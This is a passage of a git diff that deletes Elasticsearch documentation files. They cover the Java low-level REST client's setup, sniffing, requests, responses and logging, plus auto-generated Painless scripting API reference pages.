the nodes list gets updated straightaway rather than at the following -ordinary sniffing round. In this case a `SniffOnFailureListener` needs to -be created at first and provided at `RestClient` creation. Also once the -`Sniffer` is later created, it needs to be associated with that same -`SniffOnFailureListener` instance, which will be notified at each failure -and use the `Sniffer` to perform the additional sniffing round as described. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniff-on-failure] --------------------------------------------------- -<1> Set the failure listener to the `RestClient` instance -<2> When sniffing on failure, not only do the nodes get updated after each -failure, but an additional sniffing round is also scheduled sooner than usual, -by default one minute after the failure, assuming that things will go back to -normal and we want to detect that as soon as possible. 
Said interval can be -customized at `Sniffer` creation time through the `setSniffAfterFailureDelayMillis` -method. Note that this last configuration parameter has no effect in case sniffing -on failure is not enabled like explained above. -<3> Set the `Sniffer` instance to the failure listener - -The Elasticsearch Nodes Info api doesn't return the protocol to use when -connecting to the nodes but only their `host:port` key-pair, hence `http` -is used by default. In case `https` should be used instead, the -`ElasticsearchNodesSniffer` instance has to be manually created and provided -as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-https] --------------------------------------------------- - -In the same way it is also possible to customize the `sniffRequestTimeout`, -which defaults to one second. That is the `timeout` parameter provided as a -query string parameter when calling the Nodes Info api, so that when the -timeout expires on the server side, a valid response is still returned -although it may contain only a subset of the nodes that are part of the -cluster, the ones that have responded until then. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniff-request-timeout] --------------------------------------------------- - -Also, a custom `NodesSniffer` implementation can be provided for advanced -use cases that may require fetching the nodes from external sources rather -than from Elasticsearch: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[custom-nodes-sniffer] --------------------------------------------------- -<1> Fetch the hosts from the external source diff --git a/docs/java-rest/low-level/usage.asciidoc b/docs/java-rest/low-level/usage.asciidoc deleted file mode 100644 index 68b91e06d6f..00000000000 --- a/docs/java-rest/low-level/usage.asciidoc +++ /dev/null @@ -1,422 +0,0 @@ -[[java-rest-low-usage]] -== Getting started - -This section describes how to get started with the low-level REST client from -getting the artifact to using it in an application. - -[[java-rest-low-javadoc]] -=== Javadoc - -The javadoc for the low level REST client can be found at {rest-client-javadoc}/index.html. - -[[java-rest-low-usage-maven]] -=== Maven Repository - -The low-level Java REST client is hosted on -https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.elasticsearch.client%22[Maven -Central]. The minimum Java version required is `1.8`. - -The low-level REST client is subject to the same release cycle as -Elasticsearch. Replace the version with the desired client version, first -released with `5.0.0-alpha4`. There is no relation between the client version -and the Elasticsearch version that the client can communicate with. The -low-level REST client is compatible with all Elasticsearch versions. - -If you are looking for a SNAPSHOT version, the Elastic Maven Snapshot repository is available -at https://snapshots.elastic.co/maven/. - -[[java-rest-low-usage-maven-maven]] -==== Maven configuration - -Here is how you can configure the dependency using maven as a dependency manager. 
-Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch.client - elasticsearch-rest-client - {version} - --------------------------------------------------- - -[[java-rest-low-usage-maven-gradle]] -==== Gradle configuration - -Here is how you can configure the dependency using gradle as a dependency manager. -Add the following to your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -dependencies { - compile 'org.elasticsearch.client:elasticsearch-rest-client:{version}' -} --------------------------------------------------- - -[[java-rest-low-usage-dependencies]] -=== Dependencies - -The low-level Java REST client internally uses the -https://hc.apache.org/httpcomponents-asyncclient-dev/[Apache Http Async Client] - to send http requests. It depends on the following artifacts, namely the async - http client and its own transitive dependencies: - -- org.apache.httpcomponents:httpasyncclient -- org.apache.httpcomponents:httpcore-nio -- org.apache.httpcomponents:httpclient -- org.apache.httpcomponents:httpcore -- commons-codec:commons-codec -- commons-logging:commons-logging - -[[java-rest-low-usage-shading]] -=== Shading - -In order to avoid version conflicts, the dependencies can be shaded and packaged -within the client in a single JAR file (sometimes called an "uber JAR" or "fat -JAR"). Shading a dependency consists of taking its content (resources files and -Java class files) and renaming some of its packages before putting them in the -same JAR file as the low-level Java REST client. Shading a JAR can be -accomplished by 3rd-party plugins for Gradle and Maven. - -Be advised that shading a JAR also has implications. Shading the Commons Logging -layer, for instance, means that 3rd-party logging backends need to be shaded as -well. - -[[java-rest-low-usage-shading-maven]] -==== Maven configuration - -Here is a configuration using the Maven -https://maven.apache.org/plugins/maven-shade-plugin/index.html[Shade] -plugin. Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - - - org.apache.maven.plugins - maven-shade-plugin - 3.1.0 - - - package - shade - - - - org.apache.http - hidden.org.apache.http - - - org.apache.logging - hidden.org.apache.logging - - - org.apache.commons.codec - hidden.org.apache.commons.codec - - - org.apache.commons.logging - hidden.org.apache.commons.logging - - - - - - - - --------------------------------------------------- - -[[java-rest-low-usage-shading-gradle]] -==== Gradle configuration - -Here is a configuration using the Gradle -https://github.com/johnrengelman/shadow[ShadowJar] plugin. Add the following to -your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -shadowJar { - relocate 'org.apache.http', 'hidden.org.apache.http' - relocate 'org.apache.logging', 'hidden.org.apache.logging' - relocate 'org.apache.commons.codec', 'hidden.org.apache.commons.codec' - relocate 'org.apache.commons.logging', 'hidden.org.apache.commons.logging' -} --------------------------------------------------- - -[[java-rest-low-usage-initialization]] -=== Initialization - -A `RestClient` instance can be built through the corresponding -`RestClientBuilder` class, created via `RestClient#builder(HttpHost...)` -static method. 
The only required argument is one or more hosts that the -client will communicate with, provided as instances of -https://hc.apache.org/httpcomponents-core-ga/httpcore/apidocs/org/apache/http/HttpHost.html[HttpHost] - as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init] --------------------------------------------------- - -The `RestClient` class is thread-safe and ideally has the same lifecycle as -the application that uses it. It is important that it gets closed when no -longer needed so that all the resources used by it get properly released, -as well as the underlying http client instance and its threads: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-close] --------------------------------------------------- - -`RestClientBuilder` also allows to optionally set the following configuration -parameters while building the `RestClient` instance: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-default-headers] --------------------------------------------------- -<1> Set the default headers that need to be sent with each request, to -prevent having to specify them with each single request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-failure-listener] --------------------------------------------------- -<1> Set a listener that gets notified every time a node fails, in case actions -need to be taken. Used internally when sniffing on failure is enabled. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-node-selector] --------------------------------------------------- -<1> Set the node selector to be used to filter the nodes the client will send -requests to among the ones that are set to the client itself. This is useful -for instance to prevent sending requests to dedicated master nodes when -sniffing is enabled. By default the client sends requests to every configured -node. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-request-config-callback] --------------------------------------------------- -<1> Set a callback that allows to modify the default request configuration -(e.g. request timeouts, authentication, or anything that the -https://hc.apache.org/httpcomponents-client-ga/httpclient/apidocs/org/apache/http/client/config/RequestConfig.Builder.html[`org.apache.http.client.config.RequestConfig.Builder`] - allows to set) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-client-config-callback] --------------------------------------------------- -<1> Set a callback that allows to modify the http client configuration -(e.g. 
encrypted communication over ssl, or anything that the -https://hc.apache.org/httpcomponents-asyncclient-dev/httpasyncclient/apidocs/org/apache/http/impl/nio/client/HttpAsyncClientBuilder.html[`org.apache.http.impl.nio.client.HttpAsyncClientBuilder`] - allows to set) - - -[[java-rest-low-usage-requests]] -=== Performing requests - -Once the `RestClient` has been created, requests can be sent by calling either -`performRequest` or `performRequestAsync`. `performRequest` is synchronous and -will block the calling thread and return the `Response` when the request is -successful or throw an exception if it fails. `performRequestAsync` is -asynchronous and accepts a `ResponseListener` argument that it calls with a -`Response` when the request is successful or with an `Exception` if it fails. - -This is synchronous: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-sync] --------------------------------------------------- -<1> The HTTP method (`GET`, `POST`, `HEAD`, etc) -<2> The endpoint on the server - -And this is asynchronous: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-async] --------------------------------------------------- -<1> The HTTP method (`GET`, `POST`, `HEAD`, etc) -<2> The endpoint on the server -<3> Handle the response -<4> Handle the failure - -You can add request parameters to the request object: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-parameters] --------------------------------------------------- - -You can set the body of the request to any `HttpEntity`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-body] --------------------------------------------------- - -IMPORTANT: The `ContentType` specified for the `HttpEntity` is important -because it will be used to set the `Content-Type` header so that Elasticsearch -can properly parse the content. - -You can also set it to a `String` which will default to -a `ContentType` of `application/json`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-body-shorter] --------------------------------------------------- - -[[java-rest-low-usage-request-options]] -==== RequestOptions - -The `RequestOptions` class holds parts of the request that should be shared -between many requests in the same application. You can make a singleton -instance and share it between all requests: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-options-singleton] --------------------------------------------------- -<1> Add any headers needed by all requests. -<2> Customize the response consumer. - -`addHeader` is for headers that are required for authorization or to work with -a proxy in front of Elasticsearch. There is no need to set the `Content-Type` -header because the client will automatically set that from the `HttpEntity` -attached to the request. 
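A concrete (if simplified) version of that singleton pattern might look like the
following; the `TOKEN` constant is a placeholder for whatever credential your
deployment uses.

["source","java"]
--------------------------------------------------
private static final RequestOptions COMMON_OPTIONS;
static {
    RequestOptions.Builder builder = RequestOptions.DEFAULT.toBuilder();
    builder.addHeader("Authorization", "Bearer " + TOKEN); // TOKEN is a placeholder credential
    COMMON_OPTIONS = builder.build();
}
--------------------------------------------------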
- -You can set the `NodeSelector` which controls which nodes will receive -requests. `NodeSelector.SKIP_DEDICATED_MASTERS` is a good choice. - -You can also customize the response consumer used to buffer the asynchronous -responses. The default consumer will buffer up to 100MB of response on the -JVM heap. If the response is larger then the request will fail. You could, -for example, lower the maximum size which might be useful if you are running -in a heap constrained environment like the example above. - -Once you've created the singleton you can use it when making requests: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-options-set-singleton] --------------------------------------------------- - -You can also customize these options on a per request basis. For example, this -adds an extra header: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-options-customize-header] --------------------------------------------------- - -==== Multiple parallel asynchronous actions - -The client is quite happy to execute many actions in parallel. The following -example indexes many documents in parallel. In a real world scenario you'd -probably want to use the `_bulk` API instead, but the example is illustrative. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-async-example] --------------------------------------------------- -<1> Process the returned response -<2> Handle the returned exception, due to communication error or a response -with status code that indicates an error - -==== Cancelling asynchronous requests - -The `performRequestAsync` method returns a `Cancellable` that exposes a single -public method called `cancel`. Such method can be called to cancel the on-going -request. Cancelling a request will result in aborting the http request through -the underlying http client. On the server side, this does not automatically -translate to the execution of that request being cancelled, which needs to be -specifically implemented in the API itself. - -The use of the `Cancellable` instance is optional and you can safely ignore this -if you don't need it. A typical usecase for this would be using this together with -frameworks like Rx Java or the Kotlin's `suspendCancellableCoRoutine`. Cancelling -no longer needed requests is a good way to avoid putting unnecessary -load on Elasticsearch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-async-cancel] --------------------------------------------------- -<1> Process the returned response, in case it was ready before the request got cancelled -<2> Handle the returned exception, which will most likely be a `CancellationException` as the request got cancelled - -[[java-rest-low-usage-responses]] -=== Reading responses - -The `Response` object, either returned by the synchronous `performRequest` methods or -received as an argument in `ResponseListener#onSuccess(Response)`, wraps the -response object returned by the http client and exposes some additional information. 
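For instance, a minimal synchronous round trip that pulls the usual pieces out
of a `Response` might look like this; the endpoint is arbitrary and
`EntityUtils` comes from the Apache HTTP libraries the client already depends
on.

["source","java"]
--------------------------------------------------
Request request = new Request("GET", "/_cluster/health");
Response response = restClient.performRequest(request);

int statusCode = response.getStatusLine().getStatusCode();   // e.g. 200
Header[] headers = response.getHeaders();                    // all response headers
String body = EntityUtils.toString(response.getEntity());    // buffered response body as a string
--------------------------------------------------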
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-response2] --------------------------------------------------- -<1> Information about the performed request -<2> The host that returned the response -<3> The response status line, from which you can for instance retrieve the status code -<4> The response headers, which can also be retrieved by name though `getHeader(String)` -<5> The response body enclosed in an https://hc.apache.org/httpcomponents-core-ga/httpcore/apidocs/org/apache/http/HttpEntity.html[`org.apache.http.HttpEntity`] - object - -When performing a request, an exception is thrown (or received as an argument - in `ResponseListener#onFailure(Exception)` in the following scenarios: - -`IOException`:: communication problem (e.g. SocketTimeoutException) -`ResponseException`:: a response was returned, but its status code indicated -an error (not `2xx`). A `ResponseException` originates from a valid -http response, hence it exposes its corresponding `Response` object which gives -access to the returned response. - -NOTE: A `ResponseException` is **not** thrown for `HEAD` requests that return -a `404` status code because it is an expected `HEAD` response that simply -denotes that the resource is not found. All other HTTP methods (e.g., `GET`) -throw a `ResponseException` for `404` responses unless the `ignore` parameter -contains `404`. `ignore` is a special client parameter that doesn't get sent -to Elasticsearch and contains a comma separated list of error status codes. -It allows to control whether some error status code should be treated as an -expected response rather than as an exception. This is useful for instance -with the get api as it can return `404` when the document is missing, in which -case the response body will not contain an error but rather the usual get api -response, just without the document as it was not found. - -Note that the low-level client doesn't expose any helper for json marshalling -and un-marshalling. Users are free to use the library that they prefer for that -purpose. - -The underlying Apache Async Http Client ships with different -https://hc.apache.org/httpcomponents-core-ga/httpcore/apidocs/org/apache/http/HttpEntity.html[`org.apache.http.HttpEntity`] - implementations that allow to provide the request body in different formats -(stream, byte array, string etc.). As for reading the response body, the -`HttpEntity#getContent` method comes handy which returns an `InputStream` -reading from the previously buffered response body. As an alternative, it is -possible to provide a custom -https://hc.apache.org/httpcomponents-core-ga/httpcore-nio/apidocs/org/apache/http/nio/protocol/HttpAsyncResponseConsumer.html[`org.apache.http.nio.protocol.HttpAsyncResponseConsumer`] - that controls how bytes are read and buffered. - -[[java-rest-low-usage-logging]] -=== Logging - -The Java REST client uses the same logging library that the Apache Async Http -Client uses: https://commons.apache.org/proper/commons-logging/[Apache Commons Logging], - which comes with support for a number of popular logging implementations. The -java packages to enable logging for are `org.elasticsearch.client` for the -client itself and `org.elasticsearch.client.sniffer` for the sniffer. - -The request tracer logging can also be enabled to log every request and -corresponding response in curl format. 
-instance when a request needs to be executed manually to check whether it
-still yields the same response as it did before. Enable trace logging for the
-`tracer` package to have such log lines printed out. Do note that this type
-of logging is expensive and should not be enabled at all times in production
-environments; rather, enable it temporarily, only when needed.
diff --git a/docs/java-rest/overview.asciidoc b/docs/java-rest/overview.asciidoc
deleted file mode 100644
index 4539406e4c3..00000000000
--- a/docs/java-rest/overview.asciidoc
+++ /dev/null
@@ -1,13 +0,0 @@
-[[java-rest-overview]]
-== Overview
-
-The Java REST Client comes in two flavors:
-
-* <>: the official low-level client for Elasticsearch.
-It allows you to communicate with an Elasticsearch cluster over HTTP.
-It leaves request marshalling and response un-marshalling to users.
-It is compatible with all Elasticsearch versions.
-
-* <>: the official high-level client for Elasticsearch.
-Based on the low-level client, it exposes API-specific methods and takes care
-of request marshalling and response un-marshalling.
\ No newline at end of file
diff --git a/docs/java-rest/redirects.asciidoc b/docs/java-rest/redirects.asciidoc
deleted file mode 100644
index a077102b405..00000000000
--- a/docs/java-rest/redirects.asciidoc
+++ /dev/null
@@ -1,49 +0,0 @@
-["appendix",role="exclude",id="redirects"]
-= Deleted pages
-
-The following pages have moved or been deleted.
-
-[role="exclude",id="_data_frame_transform_apis"]
-=== {transform-cap} APIs
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-get-data-frame-transform"]
-=== Get {transform} API
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-get-data-frame-transform-stats"]
-=== Get {transform} stats API
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-put-data-frame-transform"]
-=== Put {transform} API
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-update-data-frame-transform"]
-=== Update {transform} API
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-delete-data-frame-transform"]
-=== Delete {transform} API
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-preview-data-frame-transform"]
-=== Preview {transform} API
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-start-data-frame-transform"]
-=== Start {transform} API
-
-See <>.
-
-[role="exclude",id="java-rest-high-dataframe-stop-data-frame-transform"]
-=== Stop {transform} API
-
-See <>.
diff --git a/docs/painless/index.asciidoc b/docs/painless/index.asciidoc
deleted file mode 100644
index c41899bbd98..00000000000
--- a/docs/painless/index.asciidoc
+++ /dev/null
@@ -1,12 +0,0 @@
-[[painless]]
-= Painless Scripting Language
-
-include::../Versions.asciidoc[]
-
-include::painless-guide.asciidoc[]
-
-include::painless-lang-spec.asciidoc[]
-
-include::painless-contexts.asciidoc[]
-
-include::painless-api-reference.asciidoc[]
\ No newline at end of file
diff --git a/docs/painless/painless-api-reference.asciidoc b/docs/painless/painless-api-reference.asciidoc
deleted file mode 100644
index 4ae770266c2..00000000000
--- a/docs/painless/painless-api-reference.asciidoc
+++ /dev/null
@@ -1,11 +0,0 @@
-[[painless-api-reference]]
-== Painless API Reference
-
-Painless has a strict list of allowed methods and classes per context to
-ensure all Painless scripts are secure. Most of these methods are
-exposed directly from the Java Runtime Environment (JRE) while others
-are part of Elasticsearch or Painless itself.
Below is a list of the available -APIs per context. The shared API is available to all contexts, while the -specialized API available differs between contexts. - -include::painless-api-reference/index.asciidoc[] diff --git a/docs/painless/painless-api-reference/index.asciidoc b/docs/painless/painless-api-reference/index.asciidoc deleted file mode 100644 index d6984656103..00000000000 --- a/docs/painless/painless-api-reference/index.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -// This file is auto-generated. Do not edit. - -[cols="<3,^3,^3"] -|==== -|Aggregation Selector | <> | <> -|Aggs | <> | <> -|Aggs Combine | <> | <> -|Aggs Init | <> | <> -|Aggs Map | <> | <> -|Aggs Reduce | <> | <> -|Analysis | <> | <> -|Bucket Aggregation | <> | <> -|Field | <> | <> -|Filter | <> | <> -|Ingest | <> | <> -|Interval | <> | <> -|Moving Function | <> | <> -|Number Sort | <> | <> -|Painless Test | <> | <> -|Processor Conditional | <> | <> -|Score | <> | <> -|Script Heuristic | <> | <> -|Similarity | <> | <> -|Similarity Weight | <> | <> -|String Sort | <> | <> -|Template | <> | <> -|Terms Set | <> | <> -|Update | <> | <> -|Watcher Condition | <> | <> -|Watcher Transform | <> | <> -|Xpack Template | <> | <> -|==== - -include::painless-api-reference-shared/index.asciidoc[] -include::painless-api-reference-aggregation-selector/index.asciidoc[] -include::painless-api-reference-aggs/index.asciidoc[] -include::painless-api-reference-aggs-combine/index.asciidoc[] -include::painless-api-reference-aggs-init/index.asciidoc[] -include::painless-api-reference-aggs-map/index.asciidoc[] -include::painless-api-reference-aggs-reduce/index.asciidoc[] -include::painless-api-reference-analysis/index.asciidoc[] -include::painless-api-reference-bucket-aggregation/index.asciidoc[] -include::painless-api-reference-field/index.asciidoc[] -include::painless-api-reference-filter/index.asciidoc[] -include::painless-api-reference-ingest/index.asciidoc[] -include::painless-api-reference-interval/index.asciidoc[] -include::painless-api-reference-moving-function/index.asciidoc[] -include::painless-api-reference-number-sort/index.asciidoc[] -include::painless-api-reference-painless-test/index.asciidoc[] -include::painless-api-reference-processor-conditional/index.asciidoc[] -include::painless-api-reference-score/index.asciidoc[] -include::painless-api-reference-script-heuristic/index.asciidoc[] -include::painless-api-reference-similarity/index.asciidoc[] -include::painless-api-reference-similarity-weight/index.asciidoc[] -include::painless-api-reference-string-sort/index.asciidoc[] -include::painless-api-reference-template/index.asciidoc[] -include::painless-api-reference-terms-set/index.asciidoc[] -include::painless-api-reference-update/index.asciidoc[] -include::painless-api-reference-watcher-condition/index.asciidoc[] -include::painless-api-reference-watcher-transform/index.asciidoc[] -include::painless-api-reference-xpack-template/index.asciidoc[] diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/index.asciidoc deleted file mode 100644 index 3a82dc9536a..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. 
- -[[painless-api-reference-aggregation-selector]] -=== Aggregation Selector API - -The following specialized API is available in the Aggregation Selector context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/packages.asciidoc deleted file mode 100644 index bf87efc3123..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggregation-selector-java-lang"] -=== Aggregation Selector API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggregation-selector-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-aggregation-selector-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Aggregation Selector API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-aggregation-selector-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-aggregation-selector-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Aggregation Selector API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggregation-selector-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-aggregation-selector-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/index.asciidoc deleted file mode 100644 index 420797f80ed..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-combine]] -=== Aggs Combine API - -The following specialized API is available in the Aggs Combine context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/packages.asciidoc deleted file mode 100644 index 273ff65e45d..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - 